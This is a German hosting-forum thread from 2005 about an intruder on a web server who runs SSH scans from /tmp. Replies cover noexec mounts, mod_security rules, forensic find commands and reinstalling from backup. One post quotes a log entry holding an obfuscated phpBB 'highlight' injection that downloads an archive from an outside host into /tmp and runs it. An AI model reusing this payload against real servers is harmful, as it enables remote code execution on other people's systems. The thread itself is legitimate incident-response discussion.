Bekomm den Angreifer nicht in Griff
-
- Posts: 17
- Joined: 2005-03-09 10:43
Bekomm den Angreifer nicht in Griff
Hallo Leute,
ich bin bald am Ende mit meinem Latein.
Folgender Sachverhalt, der (böse) Surfer erlangt wahrscheinlich via PHP Introducion oder MySQL Introducion Schreibrechte auf /tmp/,
dann legt er darin sein scheiss script ab und startet so um dis 200 SSH Scans. Ich habe alle Logfiles durchgesehen, kann Ihn doch jedoch nicht lokalisieren über welchen Kunden Acount er drauf kommt.
System: Suse 9.0, PHP 4.3.10, Confixx 3.07
Solche niedlichen Sachen hat er auch immer noch dabei:
/tmp/.access.log/y2kupdate >/dev/null 2>&1
jetzt gerade
pscan2
ich bin bald am Ende mit meinem Latein.
Folgender Sachverhalt, der (böse) Surfer erlangt wahrscheinlich via PHP Introducion oder MySQL Introducion Schreibrechte auf /tmp/,
dann legt er darin sein scheiss script ab und startet so um dis 200 SSH Scans. Ich habe alle Logfiles durchgesehen, kann Ihn doch jedoch nicht lokalisieren über welchen Kunden Acount er drauf kommt.
System: Suse 9.0, PHP 4.3.10, Confixx 3.07
Solche niedlichen Sachen hat er auch immer noch dabei:
/tmp/.access.log/y2kupdate >/dev/null 2>&1
jetzt gerade
pscan2
-
- Userprojekt
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
Re: Bekomm den Angreifer nicht in Griff
Unter welchem User laufen die unter /tmp liegenden Prozesse denn? Warum hast du /tmp nicht längst noexec gemountet? Warum läuft der Apache dann noch? Hast du schon ein Backup der Nutzdaten und der Logs angelegt?
Fragen über Fragen...
Fragen über Fragen...
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
-
- Posts: 17
- Joined: 2005-03-09 10:43
Re: Bekomm den Angreifer nicht in Griff
CaptainCrunch wrote:Unter welchem User laufen die unter /tmp liegenden Prozesse denn? Warum hast du /tmp nicht längst noexec gemountet? Warum läuft der Apache dann noch? Hast du schon ein Backup der Nutzdaten und der Logs angelegt?
Fragen über Fragen...
- Die Prozesses "des freundes" laufen als WWWRUN
- Daten sind gesichert
- Logs sind gesichert
- ich bekomm ihn manuell nur von der Kiste
- es muss doch möglich sein Ihn zu lokalisieren...
-
- Userprojekt
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
Re: Bekomm den Angreifer nicht in Griff
Ja, und zwar, nachdem die Kiste neu aufgesetzt ist, und du das oder die unsichere(n) Script(e) lokalisiert und ausgemerzt hast.ich bekomm ihn manuell nur von der Kiste
Klar, spätestens in den Logs deines Webservers sollten sich massig Anhaltspunkte finden...so lange derjenige nicht schlau genug war, diese Spuren wenigstens ansatzweise zu verwischen (was ich aber nicht annehme).es muss doch möglich sein Ihn zu lokalisieren...
Zurück zum noexec auf /tmp: warum ist das immer noch nciht passiert?
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
-
- Posts: 17
- Joined: 2005-03-09 10:43
Re: Bekomm den Angreifer nicht in Griff
noexec auf /tmp werdsch gleich machen.
Ich bin schon beim durchforsetn von scripten und logs, ich kann den Zeitraum mittlerweile auf fast 10 Minuten eingrenzen und bekomm ihn nicht gefasst.
Ich bin schon beim durchforsetn von scripten und logs, ich kann den Zeitraum mittlerweile auf fast 10 Minuten eingrenzen und bekomm ihn nicht gefasst.
-
- Posts: 17
- Joined: 2005-03-09 10:43
Re: Bekomm den Angreifer nicht in Griff
Code: Select all
phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(98)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(103)%252echr(111)%252echr(46)%252echr(114)%252echr(111)%252echr(47)%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(46)%252echr(116)%252echr(103)%252echr(122)%252echr(59)%252echr(116)%252echr(97)%252echr(114)%252echr(32)%252echr(120)%252echr(122)%252echr(118)%252echr(102)%252echr(32)%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(46)%252echr(116)%252echr(103)%252echr(122)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(46)%252echr(107)%252echr(59)%252echr(46)%252echr(47)%252echr(98)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1" 200 23055 "-" "Mozilla/3.0 (compatible; Indy Library)"
Würde auf's phpbb2 Board ja deuten....
-
- Userprojekt
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
Re: Bekomm den Angreifer nicht in Griff
Siehst schwer danach aus. Um welche phpbb-Version handelt's sich denn?
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
-
- Posts: 17
- Joined: 2005-03-09 10:43
Re: Bekomm den Angreifer nicht in Griff
PHPBB PLUs 1.5X denke ich,CaptainCrunch wrote:Siehst schwer danach aus. Um welche phpbb-Version handelt's sich denn?
ich habe den Kunden erstmal gesperrt, und mach emich nun auf die Suche...
-
- Project Manager
- Posts: 11183
- Joined: 2003-02-27 01:00
- Location: Hamburg
Re: Bekomm den Angreifer nicht in Griff
Das phpBB-Plus beziehungsweise die enthaltenen Mods enthalten mehrere bekannte Sicherheitslücken, wobei der von Dir gepostete Logeintrag zeigt, dass das von Deinem Kunden verwendete phpBB-Plus seit mindestens Dezember 2004 (Stichwort: Santy) nicht upgedatet wurde...Bierteufel wrote:PHPBB PLUs 1.5X denke ich,
ich habe den Kunden erstmal gesperrt, und mach emich nun auf die Suche...
PayPal.Me/JoeUser ● FreeBSD Remote Installation
Wings for Life ● Wings for Life World Run
„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
Wings for Life ● Wings for Life World Run
„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.
-
- Posts: 78
- Joined: 2004-06-16 03:33
Re: Bekomm den Angreifer nicht in Griff
Hallo,
In diesem Zusammenhang:
http://www.rootforum.org/forum/viewtopic.php?t=35865
Das hilft (meistens)
Ich verwende übrigens die in dem oben genannten Thread nicht uneingeschränkt empfehlenswerten Rules von gotroot:
http://www.gotroot.com/tiki-index.php?p ... ownloa%20d
Funktionieren bei mir bisher 100% zuverlässig. Nachteil: Da für jedes Programm und für jede bekannte Sicherheitslücke versucht wird eine Regel zu erstellen, sind es extrem viele Rules.
Vorteil: bisher wurde noch keine erwünschte funktion von mod_security verhindert, was bei kleiner gehaltenen Rulesets durchaus vorkommen kann.
MfG
Christian
PS: Natürlich sollte man trotzdem bekannte Sicherheitlöcher stopfen und sich nicht zusehr auf mod_security verlassen, aber es bietet doch einen guten Schutz wenn man mal was übersieht.
Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.
Siehe: http://www.debian.org/doc/manuals/secur ... h4.de.html Abschnitt 4.9.1
In diesem Zusammenhang:
http://www.rootforum.org/forum/viewtopic.php?t=35865
Das hilft (meistens)
Ich verwende übrigens die in dem oben genannten Thread nicht uneingeschränkt empfehlenswerten Rules von gotroot:
http://www.gotroot.com/tiki-index.php?p ... ownloa%20d
Funktionieren bei mir bisher 100% zuverlässig. Nachteil: Da für jedes Programm und für jede bekannte Sicherheitslücke versucht wird eine Regel zu erstellen, sind es extrem viele Rules.
Vorteil: bisher wurde noch keine erwünschte funktion von mod_security verhindert, was bei kleiner gehaltenen Rulesets durchaus vorkommen kann.
MfG
Christian
PS: Natürlich sollte man trotzdem bekannte Sicherheitlöcher stopfen und sich nicht zusehr auf mod_security verlassen, aber es bietet doch einen guten Schutz wenn man mal was übersieht.
Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.
Siehe: http://www.debian.org/doc/manuals/secur ... h4.de.html Abschnitt 4.9.1
Last edited by killerhorse on 2005-09-01 14:54, edited 1 time in total.
-
- Userprojekt
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
Re: Bekomm den Angreifer nicht in Griff
Diese Information ist seit (IIRC) Kernel 2.4.13 obsolet.Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
-
- Posts: 78
- Joined: 2004-06-16 03:33
Re: Bekomm den Angreifer nicht in Griff
Oh, wusste ich nicht, danke für den Tipp.CaptainCrunch wrote:Diese Information ist seit (IIRC) Kernel 2.4.13 obsolet.Ã?brigens: Das mit dem /tmp mit noexec mounten, ist auch kein 100%iger schutz, denn diese Einschränkung lässt sich relativ leicht umgehen.
-
- Userprojekt
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
Re: Bekomm den Angreifer nicht in Griff
Die genaue Version müsstest du mal raussuchen, hatte ich hier irgendwann mal gepostet, aber auf die Schnelle nicht wiedergefunden.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
-
- Posts: 774
- Joined: 2004-04-26 15:57
Re: Bekomm den Angreifer nicht in Griff
Beende den Apache und kopiere mal die find Binary nochmal von einer sauberen Kiste hoch. Mit find / -ctime <tage> und find / -atime <tage> kannst du dann jede File die in den letzten Tagen erstellt wurde finden. Schau ebenfalls mal in die passwd ob ein user angelegt wurde oder der www-data user einen Loginshell bekommen hat und in einer anderen Gruppe mit drinhängt. find / -user www-data ist dann recht nützlich wenn du alle files finden willst du mit dem XSS angelegt wurden (und auch deine normalen files). Ausserdem währe vielleicht noch ein lsattrib /bin | grep "ia" ne Idee Wert, solltest überall anwenden wo deine Programme liegen (/sbin /usr/(s)bin/ usw.) .
Btw.: Wenn du lustig bist, entwirrst du mal den Shellcode, vielleicht kommst du dahinter was gemacht wurde.
Btw.: Wenn du lustig bist, entwirrst du mal den Shellcode, vielleicht kommst du dahinter was gemacht wurde.
-
- Posts: 470
- Joined: 2002-05-14 13:02
- Location: Karlsruhe City
Re: Bekomm den Angreifer nicht in Griff
Oder einfacher:
a) Rechner runterfahren
b) Neu initialisieren lassen
c) Geprüftes Backup einspielen
d) Lücken beseitigen
e) Wieder online gehen.
Gruss,
Out
a) Rechner runterfahren
b) Neu initialisieren lassen
c) Geprüftes Backup einspielen
d) Lücken beseitigen
e) Wieder online gehen.
Gruss,
Out
-
- Userprojekt
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
Re: Bekomm den Angreifer nicht in Griff
Wie oft kommen solche "Tips" eigentlich noch hoch? http://www.rootforum.org/faq/index.php? ... artlang=de
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc